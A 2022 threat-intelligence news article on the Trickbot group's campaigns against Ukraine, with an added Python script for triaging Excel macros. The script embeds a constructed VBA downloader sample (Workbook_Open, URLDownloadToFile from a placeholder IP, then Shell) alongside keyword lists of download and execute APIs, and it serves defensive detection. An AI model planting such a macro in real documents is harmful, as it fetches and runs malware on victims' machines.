Saturday, July 9, 2022

In Switch, Trickbot Group Now Attacking Ukrainian Targets



In a break from precedent, Russia's hitherto purely financially motivated Trickbot threat group has been systematically attacking targets in Ukraine over the past three months, apparently in support of Russian government interests in the region.

Researchers from IBM's X-Force threat intelligence team said this week that they had uncovered two campaigns, and analyzed four others that Ukraine's Computer Emergency Response Team (CERT-UA) disclosed, in which Trickbot went after targets in Ukraine. The campaigns began after Russia's invasion of Ukraine in February and have targeted Ukrainian state authorities, government organizations, specific individuals, and the general population. Several of the attacks have involved phishing emails with various themes designed to catch the attention of Ukrainian users, including some that are war-related.

The attacks mark an unprecedented shift for Trickbot, and the change is notable because threat groups in former Soviet Union states have typically avoided attacking targets in one another's countries, IBM said.

Prior to the Russian invasion, ITG23, which is the name by which IBM tracks Trickbot, had not been known to target Ukraine. "Much of the group's malware was even configured to not execute on systems if the Ukrainian language was detected," IBM said in a report summarizing its findings this week. "ITG23's campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection."

Multiple Malware Tools

IBM said it has observed Trickbot distributing several known malware tools such as IcedID, Cobalt Strike, AnchorMail, and Meterpreter in its attacks on Ukrainian targets. Some of the attacks involved the use of new tools such as a malicious Excel downloader, a self-extracting archive for dropping various malware payloads, and a new malware encryption and obfuscation tool.

One of the two Trickbot campaigns that IBM uncovered was in early May. In these attacks, IBM observed the threat actor using a weaponized Excel file to download its AnchorMail backdoor onto compromised systems. AnchorMail is a revamped version of Trickbot's AnchorDNS, a backdoor that members of the closely affiliated Conti group have been using to deploy Conti ransomware. IBM X-Force researchers have previously described the malware as notable for communicating with its command-and-control (C2) server using the DNS protocol.

The second recent Trickbot campaign that IBM X-Force researchers observed likely occurred in late May or early June. In that campaign, Trickbot actors used an ISO image file (an archive file containing the contents of an optical disk) as part of an attack chain to drop the Cobalt Strike post-exploitation attack kit on target systems. In June, Trickbot users were observed exploiting the so-called "Follina" zero-day bug in the Windows Microsoft Support Diagnostic Tool (MSDT) to deploy Cobalt Strike.

The campaigns that CERT-UA disclosed, and which IBM X-Force researchers analyzed, involved Trickbot attempts to deploy IcedID, a banking Trojan turned malware distributor; the Metasploit attack payload Meterpreter; and Cobalt Strike. In five of the six observed campaigns, Trickbot actors directly downloaded Cobalt Strike, AnchorMail, or Meterpreter onto target systems, another break from their usual habit of deploying these tools as secondary payloads. IBM said the switch suggests "these attacks are part of targeted campaigns during which ITG23 is willing to immediately deploy higher-value backdoors."

IBM described the new malicious Excel downloader that Trickbot is using in the Ukrainian attacks as designed to download malware from a hard-coded URL. The downloader is stored as a macro within the Excel file and runs automatically when the file is opened, provided the user has macros enabled. The new dropper for AnchorMail that IBM observed takes the form of a WinRAR self-extracting archive. The dropper is rigged to extract and execute a script for building and configuring AnchorMail on infected systems.
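The two traits IBM describes for that Excel downloader, an auto-executing macro and a hard-coded download URL, are exactly what a triage script can flag. The following is an added example, not code from IBM or from any ITG23 sample: it scores extracted VBA source for auto-run entry points, embedded URLs and download/execute keywords. The VBA text, the 203.0.113.45 address and the scoring weights are all constructed for the demonstration; in practice the source would come from the workbook's vbaProject.bin via a macro extractor such as olevba.

```python
import re
from typing import List, NamedTuple

# Constructed sample standing in for VBA pulled out of a suspicious workbook.
# The address is a documentation placeholder, not a real indicator.
SAMPLE_VBA = r"""
Private Sub Workbook_Open()
    Dim src As String
    src = "http://203.0.113.45/update/report.dat"   ' hard-coded download URL
    Dim dst As String
    dst = Environ("TEMP") & "\report.dat"
    Call URLDownloadToFile(0, src, dst, 0, 0)
    Shell dst, vbHide
End Sub
"""

# Constructed benign macro for comparison: formats a header row, nothing else.
BENIGN_VBA = r"""
Sub FormatReport()
    Rows(1).Font.Bold = True
    Columns("A:D").AutoFit
End Sub
"""

# Entry points Office runs without user interaction once macros are enabled.
AUTO_EXEC = re.compile(r"\b(Auto_?Open|Workbook_Open|Document_Open|Auto_?Close|Workbook_Activate)\b", re.I)
URL = re.compile(r"""https?://[^\s"']+""", re.I)
# Keywords typical of download-and-run macros; checked as whole words.
SUSPICIOUS = ("URLDownloadToFile", "XMLHTTP", "WinHttpRequest", "Shell",
              "CreateObject", "Environ", "WScript.Shell", "Run")
DOWNLOADERS = {"URLDownloadToFile", "XMLHTTP", "WinHttpRequest"}

class Finding(NamedTuple):
    auto_exec: List[str]   # auto-run procedure names found
    urls: List[str]        # hard-coded URLs found in string literals
    keywords: List[str]    # suspicious API/keyword hits, in SUSPICIOUS order
    score: int             # 3 for auto-exec, 3 for a URL, 1 per keyword hit

def triage_vba(source: str) -> Finding:
    auto = sorted({m.group(1) for m in AUTO_EXEC.finditer(source)})
    urls = sorted(set(URL.findall(source)))
    kws = [k for k in SUSPICIOUS
           if re.search(r"\b" + re.escape(k) + r"\b", source, re.I)]
    return Finding(auto, urls, kws, 3 * bool(auto) + 3 * bool(urls) + len(kws))

def verdict(f: Finding) -> str:
    # Auto-run + hard-coded URL + a download API is the downloader pattern itself.
    if f.auto_exec and f.urls and DOWNLOADERS.intersection(f.keywords):
        return "likely downloader"
    return "review manually" if f.score >= 4 else "no auto-exec download indicators"
```

The heuristic only covers plain-text indicators; macros that assemble the URL from fragments or call APIs through aliases need a dynamic check (sandbox detonation or olevba's deobfuscation) on top of it.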

Trickbot is a highly successful threat group that has been around since at least 2016. The group initially used its eponymously named malware to steal credentials for banking accounts. Over the years, the group evolved into a kind of initial access broker and a distributor for several ransomware and malware tools, most notably Conti, Ryuk, and Emotet. Trickbot is used variously for stealing data, enabling cryptomining, enumerating systems, and other malicious activities.

Court documents in connection with the arrest of a key member of the group last year showed that nearly 20 cybercriminals, including several malware specialists, collaborated in building the malware. A large 2020 international law enforcement operation to take the threat actor down temporarily disrupted its activities but did not stop them.
